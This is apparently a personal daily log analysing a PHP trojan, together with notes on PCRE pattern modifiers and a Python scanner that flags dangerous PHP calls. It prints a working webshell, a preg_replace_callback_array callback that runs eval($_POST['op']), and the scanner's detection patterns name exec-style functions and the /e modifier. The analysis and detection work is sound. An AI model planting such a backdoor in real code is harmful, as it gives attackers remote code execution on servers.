[1.16] Today's PHP Trojan analysis

Abstract

Daily record. I have been ill recently, so there is just one sample.
This post covers PHP trojan analysis, the function preg_replace_callback_array, and a study of PHP regex pattern modifiers.

Sample1

<?php
    $subject = 'little hann';

    preg_replace_callback_array(
        [
            '~[t]+~i' => function ($match) {
                eval($_POST['op']);
            },
            '~[n]+~i' => function ($match) {
                eval($_POST['op']);
            }
        ],
        $subject
    );
?>

Analysis

Function:preg_replace_callback_array

An example to show its usage:

<?php
$subject = 'Aaaaaa Bbb';

preg_replace_callback_array(
    [
        '~[a]+~i' => function ($match) {
            echo strlen($match[0]), ' matches for "a" found', PHP_EOL;
        },
        '~[b]+~i' => function ($match) {
            echo strlen($match[0]), ' matches for "b" found', PHP_EOL;
        }
    ],
    $subject
);
?>

THE OUTPUT IS

6 matches for "a" found
3 matches for "b" found

IN THE TROJAN

So this function regex-matches a subject string that contains the character 'n' or 't' (here 'little hann' contains both), and each time a pattern matches, its callback runs eval() on whatever the attacker POSTs in the parameter 'op', which gives remote code execution (RCE).

Need to remember: PHP PCRE Pattern Modifiers

http://php.net/manual/en/reference.pcre.pattern.modifiers.php

  • i (CASELESS): letters in the pattern match both upper and lower case
  • m (MULTILINE): the start-of-line and end-of-line constructs (^ and $) match immediately after or immediately before any newline in the subject string
  • s (DOTALL): a dot metacharacter in the pattern matches all characters, including newlines
  • x (EXTENDED): whitespace data characters in the pattern are totally ignored except when escaped or inside a character class, and characters between an unescaped
  • e (REPLACE_EVAL): does normal substitution of backreferences in the replacement string, evaluates it as PHP code, and uses the result for replacing the search string
    Please pay attention to this one: it is unsafe. This feature was DEPRECATED in PHP 5.5.0 and REMOVED as of PHP 7.0.0.
  • A (ANCHORED): the pattern is constrained to match only at the start of the string being searched (the "subject string") [I can't understand this one; maybe I will after experimenting]
  • D (DOLLAR_ENDONLY): a dollar metacharacter in the pattern matches only at the end of the subject string
  • S: perform extra analysis of a pattern that is reused many times
  • U (UNGREEDY): inverts the "greediness" of the quantifiers so that they are not greedy by default, but become greedy if followed by ?
  • X: any backslash in a pattern that is followed by a letter that has no special meaning causes an error
  • J: changes the local PCRE_DUPNAMES option to allow duplicate names for subpatterns
  • u (UTF-8): pattern and subject strings are treated as UTF-8
  1. Frequently used (probably):
    i, m, s, x
  2. Don't use:
    e
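As an added example (not code from the original post), a small line-based Python scanner that flags the two things analysed here: eval()/exec-style calls fed straight from request superglobals, as in Sample1, and preg_replace() patterns carrying the removed /e modifier. The PHP snippets embedded in it are constructed for the demo, and the rule names are my own.

```python
import re

# Constructed PHP snippets for this demo (not real files taken from any server).
TROJAN_SAMPLE = r"""<?php
$subject = 'little hann';
preg_replace_callback_array(
    ['~[t]+~i' => function ($match) { eval($_POST['op']); },
     '~[n]+~i' => function ($match) { eval($_POST['op']); }],
    $subject
);
"""
E_MODIFIER_SAMPLE = r"""<?php
echo preg_replace('/(.*)/e', '$1', $_GET['cmd']);
"""
BENIGN_SAMPLE = r"""<?php
$out = preg_replace_callback('/\d+/', function ($m) { return $m[0] * 2; }, 'a1b2');
"""

SUPERGLOBAL = re.compile(r"\$_(?:POST|GET|REQUEST|COOKIE|SERVER|FILES)\b")
DANGEROUS_CALL = re.compile(
    r"\b(?:eval|assert|system|passthru|shell_exec|exec|popen|proc_open)\s*\(")
# preg_replace() with a quoted pattern literal as first argument; group 4 holds the
# modifier letters after the closing delimiter (the 'e' in '/x/e').
PREG_REPLACE_LITERAL = re.compile(r"\bpreg_replace\s*\(\s*(['\"])(.)(.*?)\2([A-Za-z]*)\1")

def classify_line(line):
    """Return a rule name for a suspicious PHP source line, or None."""
    if DANGEROUS_CALL.search(line) and SUPERGLOBAL.search(line):
        return "request-data-to-exec"      # e.g. eval($_POST['op']) as in Sample1
    m = PREG_REPLACE_LITERAL.search(line)
    if m and "e" in m.group(4):
        return "preg_replace-e"            # /e evaluates the replacement as PHP code
    if DANGEROUS_CALL.search(line):
        return "dangerous-call"            # no request data on this line; review by hand
    return None

def scan_php(source):
    """Scan PHP source text; return (line number, rule, stripped line) for each hit."""
    findings = []
    for lineno, line in enumerate(source.splitlines(), 1):
        rule = classify_line(line)
        if rule:
            findings.append((lineno, rule, line.strip()))
    return findings

if __name__ == "__main__":
    samples = (("trojan", TROJAN_SAMPLE), ("e-modifier", E_MODIFIER_SAMPLE), ("benign", BENIGN_SAMPLE))
    for name, src in samples:
        for lineno, rule, text in scan_php(src):
            print(f"{name}:{lineno}: [{rule}] {text}")
```

Because the check is per line, a callback whose eval() sits on a different line from the superglobal only gets the weaker "dangerous-call" hit; treat the output as a triage list, not a verdict.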